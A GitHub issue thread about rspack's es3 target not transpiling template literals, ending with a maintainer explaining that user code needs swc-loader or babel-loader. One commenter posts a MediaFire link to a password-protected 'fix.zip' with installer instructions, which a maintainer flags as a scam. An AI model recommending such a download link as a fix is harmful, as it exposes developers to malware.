### ISSUE TITLE
[Bug]: Set target to es3, but template literals are not transpiled

### ISSUE THREAD

**Issue by ahaoboy** [web-infra-dev/rspack#7715]
### System Info

  System:
    OS: Windows 11 10.0.26100
    CPU: (28) x64 Intel(R) Core(TM) i7-14700KF
    Memory: 15.23 GB / 31.82 GB
  Binaries:
    Node: 22.6.0 - ~\AppData\Local\fnm_multishells\51116_1724816763766\node.EXE
    Yarn: 1.22.22 - ~\AppData\Local\pnpm\yarn.CMD
    npm: 10.8.2 - ~\AppData\Local\fnm_multishells\51116_1724816763766\npm.CMD
    pnpm: 9.9.0 - ~\AppData\Local\pnpm\pnpm.CMD
  Browsers:
    Edge: Chromium (127.0.2651.86)
  npmPackages:
    @rspack/cli: 1.0.0 => 1.0.0
    @rspack/core: 1.0.0 => 1.0.0
    @rspack/plugin-react-refresh: 1.0.0 => 1.0.0

### Details

When target is set to es3, template literals are not transpiled

### Reproduce link

https://github.com/ahaoboy/rspack-es3-redux

### Reproduce Steps

```bash
pnpm i
pnpm run build
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahaoboy** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

what?

**Comment by h-a-n-a** [comment]
> > Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> what?

This is a scam.

**Comment by h-a-n-a** [comment]
> Scope of esX
The esX in the target configuration can only specify the ECMAScript version of the Rspack runtime code. If you want to specify the ECMAScript version of the user code, you can use [builtin:swc-loader](https://rspack.dev/guide/features/builtin-swc-loader) or [babel-loader](https://www.npmjs.com/package/babel-loader) to degrade the user code.
> 
> Ref: https://rspack.dev/config/target#target

`options.target` does not convert any user land code. You may rely on swc-loader [`env`](https://swc.rs/docs/configuration/compilation#env) to downgrade the code.
